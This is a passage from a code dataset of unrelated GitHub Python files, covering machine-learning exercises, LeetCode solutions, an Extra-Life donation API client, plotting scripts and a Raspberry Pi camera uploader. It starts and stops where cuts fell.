ROOT+'data_batch_'+str(b)\n X, Y = load_CIFAR_batch(f)\n xs.append(X)\n ys.append(Y)\n Xtr = np.concatenate(xs)\n Ytr = np.concatenate(ys)\n del X, Y\n Xte, Yte = load_CIFAR_batch(filename=(ROOT+'test_batch'))\n return Xtr, Ytr, Xte, Yte\n\n\nclass NearestNeighbor(object):\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\" X is N x D where each row is an example. Y is 1-dimension of size N \"\"\"\n # the nearest neighbor classifier simply remembers all the training data\n self.Xtr = X\n self.ytr = y\n\n def predict(self, X):\n \"\"\" X is N x D where each row is an example we wish to predict label for \"\"\"\n num_test = X.shape[0]\n # lets make sure that the output type matches the input type\n Ypred = np.zeros(num_test, dtype=self.ytr.dtype)\n\n # loop over all test rows\n for i in range(num_test):\n # find the nearest training image to the i'th test image\n # using the L1 distance (sum of absolute value differences)\n distances = np.sum(np.abs(self.Xtr - X[i, :]), axis=1)\n min_index = np.argmin(distances) # get the index with smallest distance\n Ypred[i] = self.ytr[min_index] # predict the label of the nearest example\n\n return Ypred\n\n\nif __name__ == '__main__':\n Xtr, Ytr, Xte, Yte = load_CIFAR10(ROOT= '../assignment1/cs231n/datasets/cifar10/') # a magic function we provide\n # flatten out all images to be one-dimensional\n Xtr_rows = Xtr.reshape(Xtr.shape[0], 32 * 32 * 3) # Xtr_rows becomes 50000 x 3072\n Xte_rows = Xte.reshape(Xte.shape[0], 32 * 32 * 3) # Xte_rows becomes 10000 x 3072\n","repo_name":"aishik-pyne/Udacity","sub_path":"CS231n/Lecture1/NearestNeighbour.py","file_name":"NearestNeighbour.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12542873641","text":"import streamlit as st\nimport pandas as pd\nst.title('My First app')\nst.header('lol')\nst.write(\"\"\" Bienvenidos a mi pagina\"\"\")\n\nnames_link = 'dataset.csv'\nnames_data = pd.read_csv(names_link)\nst.title('Read.csv')\n\nst.dataframe(names_data)","repo_name":"C4RLO5lg/C4RLO5lg.github.io","sub_path":"stramlit.py","file_name":"stramlit.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36470714158","text":"import os\nimport json\nimport random\nimport numpy as np\nfrom typing import List, Dict\n\nclass Project(object):\n '''Benchmark Project Object.\n\n Due to different implementation of the benchmarking framework, we need to specialize\n methods for different languages to process the data.\n '''\n\n def __init__(self, path: str, name : str):\n super(Project, self).__init__()\n self.path = path\n self.name = name\n self.table : Dict = {}\n self._data = None\n\n @staticmethod\n def random_color():\n '''random color in RGB format.\n '''\n return (random.random(), random.random(), random.random())\n\n def data_file(self):\n data_file_list = []\n # find any file end with data.json and put it into this list\n for (root, dirs, files) in os.walk(os.path.join(self.path, 'data')):\n for file in files:\n if file.endswith('data.json'):\n data_file_list.append(os.path.join(root, file))\n return data_file_list\n\n def read_data(self):\n last = self.data_file()[-1]\n with open(last) as f:\n data = json.load(f)\n\n return data\n\n @property\n def data(self):\n if self._data is None:\n self._data = self.read_data()\n\n return self._data\n\n def get_label(self, data, label : str):\n raise 
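The `NearestNeighbor` class above stops short of an evaluation step. A sketch of how the flattened rows would typically be used; the 100-image subset is an arbitrary choice to keep the O(test x train) Python loop tractable, not something from the source:

```python
nn = NearestNeighbor()
nn.train(Xtr_rows, Ytr)                  # memorize all 50000 training rows
Yte_pred = nn.predict(Xte_rows[:100])    # predicting all 10000 rows is very slow
print('accuracy: %f' % np.mean(Yte_pred == Yte[:100]))
```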
NotImplementedError\n\n def get_min_time(self, entry):\n raise NotImplementedError\n\n def get_nqubits(self, entry):\n raise NotImplementedError\n\n def labels(self, data):\n raise NotImplementedError\n\n def update_table(self, labels : List[str]):\n for label in labels:\n label_data = self.get_label(self.data, label)\n if label_data:\n min_times = [self.get_min_time(each) for each in label_data]\n nqubits = [self.get_nqubits(each) for each in label_data]\n indices = sorted(range(len(nqubits)), key=lambda k : nqubits[k])\n min_times = [min_times[k] for k in indices]\n nqubits = [nqubits[k] for k in indices]\n self.table[label] = {\"nqubits\": nqubits, \"times\": min_times}\n\n\n def absolute(self, plots : List, colors = None):\n for each in plots:\n for label in each.labels:\n if label in self.table:\n d = self.table[label]\n if colors is None:\n color = self.random_color()\n else:\n color = colors[label]\n\n line = each.ax.semilogy(d[\"nqubits\"], d[\"times\"], '-o', markersize=4, color=color)\n each.add_line(self, line)\n\n\n def relative(self, project, plots : List, colors = None):\n for each in plots:\n for label in each.labels:\n if label in self.table:\n d = self.table[label]\n if colors is None:\n color = self.random_color()\n else:\n color = colors[label]\n\n\n line = each.ax.semilogy(d[\"nqubits\"],\n np.array(d['times'])/np.array(project.table[label]['times']), '-o', markersize=4, color=color)\n each.add_line(self, line)\n\n\nclass PythonProject(Project):\n\n def __init__(self, path : str, name : str = None):\n if name is None:\n name = os.path.basename(path)\n\n super(PythonProject, self).__init__(path, name)\n\n\n def labels(self, data = None):\n if data is None:\n data = self.read_data()\n return set([each['group'] for each in data['benchmarks']])\n\n def get_label(self, data, label : str):\n return [each for each in data['benchmarks'] if each['group'] == label]\n\n def get_min_time(self, entry):\n return entry['stats']['min'] * 1e9 # convert to ns\n\n def get_nqubits(self, entry):\n return entry['params']['nqubits']\n\nclass JuliaProject(Project):\n\n def __init__(self, path : str, name : str = None):\n name = os.path.basename(path)\n name = name.capitalize()\n super(JuliaProject, self).__init__(path, name)\n\n def get_label(self, data, label : str):\n return data[label]\n\n def get_min_time(self, entry):\n return entry['times']\n\n def get_nqubits(self, entry):\n return entry['nqubits']\n\n def update_table(self, labels):\n for l in labels:\n self.table[l] = self.data[l]\n\n\n\nclass Plot:\n\n def __init__(self, ax, title, labels = None, lines = None):\n self.ax = ax\n self.title = title\n\n if labels is None:\n self.labels = []\n else:\n self.labels = labels\n\n if lines is None:\n self._lines = {}\n else:\n self._lines = lines\n\n def add_line(self, project : Project, line):\n if project in self._lines:\n self._lines[project].append(line)\n else:\n self._lines[project] = [line]\n\n def getlines(self, project : Project = None):\n if project is None:\n lines = []\n for ls in self._lines.values():\n lines.append(ls)\n\n return lines\n\n else:\n return self._lines[project]\n\n @property\n def lines(self):\n return self.getlines()\n","repo_name":"yardstiq/quantum-benchmarks","sub_path":"bin/utils/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"37"} +{"seq_id":"35675622856","text":"#job scheduling 
prob:\r\n#https://www.youtube.com/watch?v=cr6Ip0J9izc&index=12&list=PLrmLmBdmIlpsHaNTPP_jHHDx_os9ItYXr\r\n\r\ndef jobScheduling(list1):\r\n solList=[]\r\n for item in list1:\r\n solList.append(item[1])\r\n \r\n for i in range(len(list1)):\r\n for j in range(0,i):\r\n #print(list1[i][0][0] , \"list1[j][1] : \", list1[j][0][1])\r\n if list1[i][0][0] >= list1[j][0][1]:#job dont overlaps\r\n solList[i] = max(solList[i] ,list1[i][1] + solList[j])\r\n \r\n \r\n print(solList) \r\n return max(solList)\r\n \r\n \r\n \r\nlist1=[[[1,3],5],\r\n [[2,5],6],\r\n [[4,6],5],\r\n [[6,7],4],\r\n [[5,8],11],\r\n [[7,9],2]\r\n ]\r\n\r\nprint(jobScheduling(list1)) \r\n\r\n\r\n","repo_name":"atulanandnitt/questionsBank","sub_path":"dp/@jobScheduling.py","file_name":"@jobScheduling.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32163314067","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\nbasket = pd.read_csv('nbastats2018-2019.csv')\n\n'''\nbasket column\n(['Height', 'Weight', 'Age', 'Salary', 'Points', 'Blocks',\n'Steals', 'Assists', 'Rebounds', 'FT%', 'FTA', 'FG3%', 'FG3A', 'FG%',\n'FGA', 'MP', 'G',\n'PER', 'OWS', 'DWS', 'WS', 'WS48', 'USG', 'BPM', 'VORP'],\ndtype='object')\nMP\nMinutes Played\nG\nGames\nPER\nPlayer Efficiency Rating\nOWS\nOffensive Win Shares\nDWS\nDefensive Win Shares\nWS\nWin Shares\nWS48\nWin Shares Per 48 Minutes\nUSG\nUsage Percentage\nBPM\nBox Plus-Minus\nVORP\nValue Over Replacement Player\n'''\n\nbasket = basket.dropna(subset=['Team'])\n\nbasket = basket.drop(['Name','Team','Weight','Height','FT%','FG3%','FG%','FGA','FG3A','FTA','MP','G',\n'PER', 'OWS',\n'DWS', 'WS', 'WS48', 'USG', 'BPM', 'VORP'],axis=1)\n\n#print(basket.dtypes)\n'''\nHeight int64\nWeight int64\nAge int64\nSalary object\nPoints float64\nBlocks float64\nSteals float64\nAssists float64\nRebounds float64\nFT% float64\nFTA float64\nFG3% float64\nFG3A float64\nFG% float64\nFGA float64\nMP float64\nG int64\nPER float64\nOWS float64\nDWS float64\nWS float64\nWS48 float64\nUSG float64\nBPM float64\nVORP float64\ndtype: object\n'''\n\nbasket['Salary'] = basket['Salary'].astype('int64')\n#karena di view sebagai object\n\n#distribution plot\n# plt.figure(figsize=(20,10))\n# plt.subplot(2,3,1)\n# plt.scatter(x='Age',y='Salary',data=basket)\n# plt.xlabel('Age')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,2)\n# plt.title('Salary Distribution Plot')\n# plt.scatter(x='Points',y='Salary',data=basket)\n# plt.xlabel('Points')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,3)\n# plt.scatter(x='Blocks',y='Salary',data=basket)\n# plt.xlabel('Blocks')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,4)\n# plt.scatter(x='Steals',y='Salary',data=basket)\n# plt.xlabel('Steals')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,5)\n# plt.scatter(x='Assists',y='Salary',data=basket)\n# plt.xlabel('Assists')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,6)\n# plt.scatter(x='Rebounds',y='Salary',data=basket)\n# plt.xlabel('Rebounds')\n# plt.ylabel('Salary')\n\n#correlation plot\n# bc = basket.corr()\n# sns.heatmap(bc,annot=True)\n# plt.show()\n\nx = basket.drop(['Salary'],axis=1)\ny = basket['Salary']\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest = train_test_split(\n x,\n y,\n test_size = .1,\n random_state = 101\n)\n\n# from sklearn.linear_model import LinearRegression\n# linmodel = LinearRegression()\n# linmodel.fit(xtrain,ytrain)\n\n\nfrom sklearn.ensemble 
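The DP above is O(n^2) because every job rescans all earlier jobs. A common refinement, not the video's method, sorts jobs by end time and binary-searches the last compatible job, giving O(n log n); it returns 17 on the same `list1`, matching the quadratic version:

```python
import bisect

def job_scheduling_fast(jobs):
    jobs = sorted(jobs, key=lambda j: j[0][1])      # sort by end time
    ends = [j[0][1] for j in jobs]
    best = [0] * (len(jobs) + 1)                    # best[i]: max profit using first i jobs
    for i, ((start, _), profit) in enumerate(jobs):
        k = bisect.bisect_right(ends, start, 0, i)  # jobs ending at or before this start
        best[i + 1] = max(best[i], best[k] + profit)
    return best[-1]

print(job_scheduling_fast(list1))  # 17, same as the O(n^2) version above
```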
import RandomForestRegressor\nRFFmodel = RandomForestRegressor()\nRFFmodel.fit(xtrain,ytrain)\n\nprint('Random Forest Regressor model score',round((RFFmodel.score(xtrain,ytrain)*100),2),'%')\n\n# print(linmodel.intercept_)\n\n# print(linmodel.coef_)\n# '''\n# [ 627686.61477924 472169.83564527 84568.44051308 2035050.59046354\n# 390478.60074215 655765.3571344 ]\n# '''\n\n# print(xtrain.columns)\n# '''\n# ['Age', 'Points', 'Blocks', 'Steals', 'Assists', 'Rebounds']\n# '''\n\n# basketcoeff = pd.DataFrame(linmodel.coef_,xtrain.columns,columns=['Coeff'])\n\n# print(basketcoeff)\n# '''\n# Coeff\n# Age 6.276866e+05\n# Points 4.721698e+05\n# Blocks 8.456844e+04\n# Steals 2.035051e+06\n# Assists 3.904786e+05\n# Rebounds 6.557654e+05\n# '''\n\n# print(linmodel.predict([[25,20,-2,2,5,10]]))\n\nimport joblib\n# joblib.dump(linmodel,'modeljoblib')\njoblib.dump(RFFmodel,'modeljoblib')","repo_name":"kevinwid2993/FinalProject","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14650286957","text":"import requests\n\n\nclass WebServiceException(Exception):\n pass\n\n\ndef team(team_id):\n \"\"\"Convenience method to instantiate a Team\n\n :param team_id: The assigned team ID\n \"\"\"\n try:\n t = Team.from_url(team_id)\n except WebServiceException:\n t = None\n\n return t\n\n\ndef participants(team_id):\n \"\"\"Convenience method to retrieve a Team's participants\n\n :param team_id: The assigned team ID\n \"\"\"\n try:\n p = Team.from_url(team_id).participants()\n except WebServiceException:\n p = None\n\n return p\n\n\ndef participant(participant_id):\n \"\"\"Convenience method to retrieve a Participant\n\n :param participant_id: The assigned participant ID\n \"\"\"\n try:\n p = Participant.from_url(participant_id)\n except WebServiceException:\n p = None\n\n return p\n\n\ndef participant_donations(participant_id):\n \"\"\"Convenience method to retrieve a Participant's donations\n\n :param participant_id: The assigned participant ID\n \"\"\"\n try:\n d = Participant.from_url(participant_id).donations()\n except WebServiceException:\n d = None\n\n return d\n\n\nclass Team(object):\n def __init__(self, team_id, name, raised, goal, avatar_url, created):\n\n # extra-life assigned team ID\n self.team_id = team_id\n\n # the team name provided by the organizer\n self.name = name\n\n # how much money the team has raised thus far\n self.raised = raised\n\n # the fundraising goal the team has, if any\n self.goal = goal\n\n # avatar image URL\n self.avatar_url = avatar_url\n\n # when the team was registered with Extra-Life\n self.created = created\n\n # participant cache - see participants()\n self._participants = None\n\n @classmethod\n def from_url(cls, team_id):\n \"\"\"Constructs an ExtraLifeTeam from the team web service.\n\n :param team_id: the Extra-Life assigned team ID\n \"\"\"\n\n url = (\"http://www.extra-life.org/\"\n \"index.cfm?fuseaction=donorDrive.team&teamID={}&format=json\")\n\n r = requests.get(url.format(team_id))\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life team \"\n \"information.\")\n\n data = r.json()\n\n name = data.get(\"name\", \"Extra-Life Team\")\n raised = data.get(\"totalRaisedAmount\", 0.0)\n goal = data.get(\"fundraisingGoal\", 0.0)\n avatar_url = data.get(\"avatarImageURL\", None)\n created = data.get(\"createdOn\", None)\n\n return cls(team_id, name, raised, goal, avatar_url, created)\n\n def 
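A sketch of consuming the model persisted above; the feature row is hypothetical and must follow the training column order ['Age', 'Points', 'Blocks', 'Steals', 'Assists', 'Rebounds'] noted in the comments:

```python
import joblib

model = joblib.load('modeljoblib')
# Hypothetical player: age 25, 20 points, 1 block, 2 steals, 5 assists, 10 rebounds.
print('predicted salary:', model.predict([[25, 20, 1, 2, 5, 10]])[0])
```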
participants(self, force=False):\n \"\"\"Returns the list of participants for the team using the\n teamParticipants web service call. This call is cached. To force a\n new service call, use force=True\n\n :param force: Ignore existing participants info. Default False.\n \"\"\"\n if self._participants is not None and not force:\n return self._participants\n\n url = (\"http://www.extra-life.org/index.cfm?\"\n \"fuseaction=donorDrive.teamParticipants&teamID={}&format=json\")\n\n r = requests.get(url.format(self.team_id))\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life team \"\n \"participant information.\")\n\n data = r.json()\n self._participants = []\n for pdata in data:\n participant_id = pdata.get(\"participantID\", None)\n created = pdata.get(\"createdOn\", None)\n last_name = pdata.get(\"lastName\", None)\n first_name = pdata.get(\"firstName\", None)\n avatar_url = pdata.get(\"avatarImageURL\", None)\n team_captain = pdata.get(\"isTeamCaptain\", False)\n\n # these fields are not present in the web service\n raised = None\n goal = None\n\n p = Participant(participant_id, self.team_id,\n team_captain, first_name, last_name,\n raised, goal, avatar_url, created)\n self._participants.append(p)\n\n return self._participants\n\n def __repr__(self):\n return \"ExtraLifeTeam\".format(self.team_id)\n\n\nclass Participant(object):\n def __init__(self, participant_id, team_id, is_team_captain, first_name,\n last_name, raised, goal, avatar_url, created):\n\n # extra-life assigned participant ID\n self.participant_id = participant_id\n\n # which team they belong to\n self.team_id = team_id\n\n # is this person a team captain?\n self.is_team_captain = is_team_captain\n\n # participant-entered name data\n self.first_name = first_name\n self.last_name = last_name\n\n # how much money this person has raised\n self.raised = raised\n\n # this person's fundraising goal\n self.goal = goal\n\n # avatar image url\n self.avatar_url = avatar_url\n\n # when this person registered\n self.created = created\n\n # the list of donations this participant has - see donations()\n self._donations = None\n\n @classmethod\n def from_url(cls, participant_id):\n \"\"\"Constructs an Participant from the participant web service.\n \n :param participant_id: The Extra-Life provided participant ID.\n \"\"\"\n url = (\"http://www.extra-life.org/index.cfm?\"\n \"fuseaction=donorDrive.participant&\"\n \"participantID={}&format=json\")\n\n r = requests.get(url.format(participant_id))\n\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life \"\n \"participant information.\")\n\n data = r.json()\n\n team_id = data.get(\"teamID\", None)\n is_team_captain = data.get(\"isTeamCaptain\", False)\n first_name = data.get(\"firstName\", \"John\")\n last_name = data.get(\"lastName\", \"Doe\")\n raised = data.get(\"totalRaisedAmount\", 0.0)\n goal = data.get(\"fundraisingGoal\", 0.0)\n avatar_url = data.get(\"avatarImageURL\", None)\n created = data.get(\"createdOn\", None)\n\n participant = cls(participant_id, team_id, is_team_captain, first_name,\n last_name, raised, goal, avatar_url, created)\n\n return participant\n\n def donations(self, force=False):\n \"\"\"Returns the list of donations for the participant using the\n participantDonations web service call. This call is cached. To force a\n new service call, use force=True\n\n :param force: Ignore existing donations info. 
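A usage sketch for the convenience helpers above; the team ID is invented, and each helper deliberately returns None when the Extra-Life web service call fails:

```python
t = team(12345)                # hypothetical Extra-Life team ID
if t is not None:
    print(t.name, t.raised, '/', t.goal)
    for p in t.participants():
        tag = '(captain)' if p.is_team_captain else ''
        print('-', p.first_name, p.last_name, tag)
```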
Default False.\n        \"\"\"\n\n        if self._donations is not None and not force:\n            return self._donations\n\n        url = (\"http://www.extra-life.org/index.cfm?\"\n               \"fuseaction=donorDrive.participantDonations&\"\n               \"participantID={}&\"\n               \"format=json\")\n\n        r = requests.get(url.format(self.participant_id))\n\n        if r.status_code != 200:\n            raise WebServiceException(\"Could not retrieve Extra-Life participant \"\n                                      \"donation information.\")\n\n        data = r.json()\n\n        self._donations = []\n        for d in data:\n            donor = d.get(\"donorName\", None)\n            amount = d.get(\"donationAmount\", None)\n            message = d.get(\"message\", None)\n            avatar_url = d.get(\"avatarImageURL\", None)\n            created = d.get(\"created\", None)\n\n            donation = Donation(self.participant_id, donor, amount,\n                                message, avatar_url, created)\n\n            self._donations.append(donation)\n\n        return self._donations\n\n    def __repr__(self):\n        return \"Participant({})\".format(self.participant_id)\n\n\nclass Donation(object):\n    def __init__(self, participant_id, donor, amount, message, avatar_url,\n                 created):\n        # the owning participant for this donation\n        self.participant_id = participant_id\n\n        # who donated the $$$\n        self.donor = donor\n\n        # the amount of the donation\n        self.amount = amount\n\n        # personalized message from the donor to the participant\n        self.message = message\n\n        # if the donor was also an ExtraLife participant, they have an avatar\n        self.avatar_url = avatar_url\n\n        # when the donor gave the money (?)\n        self.created = created\n\n    def __repr__(self):\n        return \"Donation({})\".format(self.participant_id)\n","repo_name":"fragforce/donation-api","sub_path":"extralife.py","file_name":"extralife.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"45127293027","text":"\"\"\"\r\nquestion:\r\nGiven a linked list, reverse its nodes k at a time and return the modified list.\r\nk is a positive integer whose value is less than or equal to the length of the list.\r\nIf the total number of nodes is not a multiple of k, the leftover nodes at the end keep their original order.\r\nNotes:\r\nYour algorithm may only use constant extra space.\r\nYou may not simply change the values inside the nodes; the nodes themselves must be swapped.\r\n\r\nexample:\r\nGiven this linked list: 1->2->3->4->5\r\nFor k = 2, return: 2->1->4->3->5\r\nFor k = 3, return: 3->2->1->4->5\r\n\"\"\"\r\n\r\n\r\nclass ListNode:\r\n\r\n    def __init__(self, x):\r\n        self.val = x\r\n        self.next = None\r\n\r\n\r\ndef create_link_list(list_number):\r\n    link_list = ListNode(0)\r\n    now_node = link_list\r\n    for temp in list_number:\r\n        new_node = ListNode(temp)\r\n        now_node.next = new_node\r\n        now_node = new_node\r\n    return link_list.next\r\n\r\n\r\nclass Solution:\r\n    def reverse_k_group(self, head, k):\r\n        \"\"\"\r\n        :param head: ListNode\r\n        :param k: int\r\n        :return: ListNode\r\n        \"\"\"\r\n        # Fast/slow pointers: slow points to the node before the group being reversed,\r\n        # fast points to the last node of that group.\r\n        if k == 1 or head is None:\r\n            return head\r\n        mark_node = ListNode(0)\r\n        mark_node.next = head\r\n        slow = head\r\n        fast = head.next\r\n        start = mark_node\r\n        while fast is not None:\r\n            k_count = 1\r\n            while k_count < k and fast is not None:\r\n                fast = fast.next\r\n                k_count += 1\r\n            if k_count == k:\r\n                while slow.next != fast:\r\n                    temp_node = slow.next\r\n                    slow.next = temp_node.next\r\n                    temp_node.next = start.next\r\n                    start.next = temp_node\r\n                start = slow\r\n                slow = slow.next\r\n                if fast is not None:\r\n                    fast = fast.next\r\n        return mark_node.next\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    test_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n    list_node = create_link_list(test_list)\r\n\r\n    solute = Solution()\r\n    result = solute.reverse_k_group(list_node, 9)\r\n    temp = result\r\n    while temp is not None:\r\n        print(temp.val)\r\n        temp = 
temp.next\r\n","repo_name":"ningmengpian/algorithm","sub_path":"reverse_k_group.py","file_name":"reverse_k_group.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70603130029","text":"from flask import Flask, request\nfrom flask_restx import Resource, Api, reqparse\n\napp = Flask(__name__)\napi = Api(app)\n\nparser = reqparse.RequestParser()\nparser.add_argument('count', required=True, type=int, help=\"The number of comments to request.\")\n\n@api.route('/comment')\nclass Comments(Resource):\n\n    @api.expect(parser)\n    def get(self):\n        args = parser.parse_args()\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=\"5001\", debug=True)","repo_name":"alsruf36/political-disposition-determiner","sub_path":"news_crawler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"16864829548","text":"from typing import List\nfrom CreateTree import TreeNode\n\n\nclass Solution:\n    def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n        def helper(preorder_left, preorder_right, inorder_left, inorder_right):\n            \"\"\"\n            The four parameters are the range pointers into the preorder list and the inorder list\n            \"\"\"\n            # base case\n            if preorder_left > preorder_right:\n                return None\n\n            # preorder list: [root, left subtree, right subtree]\n            # inorder list: [left subtree, root, right subtree]\n\n            # the first element of the preorder list is the root value\n            root_val = preorder[preorder_left]\n            # get the index of the root node in the inorder list\n            root_idx = inorder.index(root_val)\n\n            # number of nodes in the left subtree\n            size_left_subtree = root_idx - inorder_left\n\n            # the four parameters for the left subtree\n            l_preorder_left = preorder_left + 1\n            l_preorder_right = preorder_left + size_left_subtree\n            l_inorder_left = inorder_left\n            l_inorder_right = root_idx - 1\n\n            # the four parameters for the right subtree\n            r_preorder_left = preorder_left + size_left_subtree + 1\n            r_preorder_right = preorder_right\n            r_inorder_left = root_idx + 1\n            r_inorder_right = inorder_right\n\n            # build the current root node, then recursively build the left and right subtrees\n            node = TreeNode(root_val)\n            node.left = helper(l_preorder_left, l_preorder_right, l_inorder_left, l_inorder_right)\n            node.right = helper(r_preorder_left, r_preorder_right, r_inorder_left, r_inorder_right)\n\n            return node\n\n        return helper(0, len(preorder) - 1, 0, len(inorder) - 1)","repo_name":"tangxyw/LeetCode","sub_path":"python/BinaryTree/[105][剑指offer07]从前序与中序遍历序列构造二叉树.py","file_name":"[105][剑指offer07]从前序与中序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"70270689708","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Run only if all the txt files are created with the same K\r\n\r\nk = pd.read_csv('PS_k.txt',header=None)\r\nWE = pd.read_csv('PS_WE.txt',header=None)\r\nKG = pd.read_csv('PS_KG.txt',header=None)\r\nsineG = pd.read_csv('PS_SG.txt',header=None)\r\nV4 = pd.read_csv('PS_V4.txt',header=None)\r\nuux = pd.read_csv('PS_uux.txt',header=None)\r\nuux2 = pd.read_csv('PS_uux2.txt',header=None)\r\nu2ux2 = pd.read_csv('PS_u2ux2.txt',header=None)\r\n\r\n\r\nplt.plot(WE,'k:',label=\"Wave Eq\")\r\nplt.plot(KG,'--',label='KG Eq')\r\nplt.plot(sineG,'--',label='sineG Eq')\r\nplt.plot(V4,'--',label='$V=\\\lambda u^4$')\r\nplt.plot(uux,'--',label=r'$u\\\nabla u$')\r\nplt.plot(uux2,'--',label=r'$u(\\\nabla u)^2$')\r\nplt.plot(u2ux2,'--',label=r'$u^2(\\\nabla u)^2$')\r\nplt.xlabel(r\"$k$\")\r\nplt.ylabel(r\"$|a_k|$\")\r\nplt.legend(loc='center left',bbox_to_anchor=(1, 
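In the `buildTree` above, `inorder.index(root_val)` costs O(n) per node, making the worst case O(n^2). Since the problem guarantees unique values, a dict from value to inorder index makes each lookup O(1); a sketch of that variant:

```python
def build_tree_fast(preorder, inorder):
    idx = {val: i for i, val in enumerate(inorder)}   # value -> inorder position

    def helper(pre_left, pre_right, in_left, in_right):
        if pre_left > pre_right:
            return None
        root_val = preorder[pre_left]
        root_idx = idx[root_val]                      # O(1) instead of list.index
        size_left = root_idx - in_left
        node = TreeNode(root_val)
        node.left = helper(pre_left + 1, pre_left + size_left, in_left, root_idx - 1)
        node.right = helper(pre_left + size_left + 1, pre_right, root_idx + 1, in_right)
        return node

    return helper(0, len(preorder) - 1, 0, len(inorder) - 1)
```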
0.5))\r\nplt.yscale('log')\r\nplt.tick_params(axis='both',direction='in',width=1,length=6)\r\nplt.show()\r\n\r\n","repo_name":"miquel25/TFG2022","sub_path":"2D Simulation/2D-PS_plot.py","file_name":"2D-PS_plot.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5656180430","text":"#!/usr/bin/python3\n# process trigger command passed over MQTT\n# 8/25/18\n# updated 6/9/19\n\nimport os\nimport logging\nimport subprocess\nfrom time import sleep\nfrom datetime import datetime\nfrom picamera import PiCamera\nfrom fractions import Fraction\nimport paho.mqtt.client as mqtt\nfrom keys import img_bucket\n\n\nclass SteadyCam:\n\n def __init__(self, basepath, hostname):\n self.logger = self._init_logger()\n self.hostname = hostname\n self.basepath = basepath\n self.remote_bucket = os.path.join(img_bucket, self.hostname)\n self.pic_path = os.path.join(self.basepath, 'imgs')\n self._del_old_pics()\n self.cam = self._init_camera()\n\n def _init_logger(self):\n logger = logging.getLogger('steady_cam')\n logger.info('mqtt_cam logger instantiated')\n return logger\n\n def _init_camera(self, resolution=(3280, 2464), shutter_speed=16670, awb_gains=(Fraction(13, 8), Fraction(439, 256))):\n '''\n shutter_speed is set to 16670 to synchronize with the 60hz refresh rate\n of US electricity. this avoids banding in the images.\n the default awb_gains value was queried from a picamera instance exposed\n to 2 daylight balanced bulbs in a studio setting.\n\n more info:\n https://picamera.readthedocs.io/en/release-1.13/recipes1.html#capturing-consistent-images\n https://picamera.readthedocs.io/en/release-1.13/fov.html#sensor-gain\n '''\n cam = PiCamera(resolution=resolution)\n cam.iso = 60\n cam.shutter_speed = 16670 # sync shutter speed with 60hz refresh rate of US electricity to avoid banding\n self.logger.info('warming up camera and setting values...')\n sleep(2)\n cam.exposure_mode = 'off' # fix the analog and digital gains, which are not directly settable\n cam.awb_mode = 'off'\n cam.awb_gains = awb_gains\n self.logger.info('camera ready')\n\n return cam\n\n def _copy_pic(self, pic_path):\n '''use scp to copy a single image to a remote host'''\n img = pic_path.split('/')[-1]\n status = subprocess.call(['scp', '-p', pic_path, self.remote_bucket], stdout=subprocess.DEVNULL)\n\n if status == 0:\n self.logger.info('copied {} to remote host'.format(img))\n else:\n self.logger.error('there was a problem copying {} to remote host'.format(img))\n\n return status\n\n def _sync_pics(self):\n '''\n use rsync to transfer files to a remote host.\n\n unlike subprocess.call (used in _copy_pic()) which blocks until process\n completes, subprocess.Popen returns immediately\n '''\n self.logger.info('syncing pic to remote machine via rsync')\n return subprocess.Popen(['rsync', '-a', self.pic_path, '--exclude=.gitignore', self.remote_bucket])\n\n def _del_old_pics(self):\n '''\n if there are pics or in imgs/, ask if we want to delete them.\n exit if we say no.\n '''\n pics = [pic.path for pic in os.scandir(self.pic_path) if pic.path.endswith('.jpg') or pic.path.endswith('.h264')]\n\n if not pics:\n self.logger.info('imgs/ directory is clean, no pics to delete')\n else:\n self.logger.error('there are files in the imgs/ directory')\n proceed = input('delete the pics now? 
